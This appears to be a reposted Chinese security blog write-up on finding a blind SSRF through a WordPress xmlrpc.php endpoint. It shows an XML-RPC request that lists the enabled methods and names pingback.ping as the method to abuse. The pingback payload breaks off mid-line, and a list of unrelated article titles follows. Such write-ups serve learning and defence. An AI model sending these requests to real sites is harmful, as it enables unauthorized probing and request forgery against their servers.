当前位置: 首页 > article >正文

【网络安全】XML-RPC漏洞之盲SSRF

未经许可,不得转载。

文章目录

    • 正文

漏洞原理参考:【网络安全】XML-RPC PHP WordPress漏洞

正文

探索目标时,访问该链接:https://www.target.com/about-us/xmlrpc.php,页面如下:

在这里插入图片描述

修改GET为POST,并构造payload,以检查 XML RPC 服务器上启用了哪些方法:

<methodCall> 
<methodName>system.listMethods</methodName> 
<params></params> 
</methodCall>

由回显可知,pingback.ping方法是可利用的,因此我构造了以下payload:

<?xml version=”1.0" e

http://www.kler.cn/a/279984.html

相关文章:

  • 【Electron】Electron学习笔记
  • Spring Boot如何压缩Json并写入redis?
  • 使用Blender进行3D建模—基础操作笔记
  • 小程序面试题一
  • 【Docker】Docker学习04 | dockerfile的编写
  • 韩顺平Java-第二十六章:正则表达式
  • C++设计模式6:适配器模式
  • SQL典型练习题
  • java程序优化
  • Redis哨兵(sentinel)
  • Qt折线图,x轴是时间,y轴是int
  • 数据结构—顺序表
  • 速盾:cdn能防ip追踪吗?
  • 设计模式 5 原型模式
  • 【Material-UI】Radio Group中的 Color 属性详解
  • sqlite3 在Python中使用
  • 在 Windows 上安装 Docker
  • 使用PyTorch AlexNet预训练模型对新数据集进行训练及预测
  • iOS 苹果健康-睡眠
  • docker基础到进阶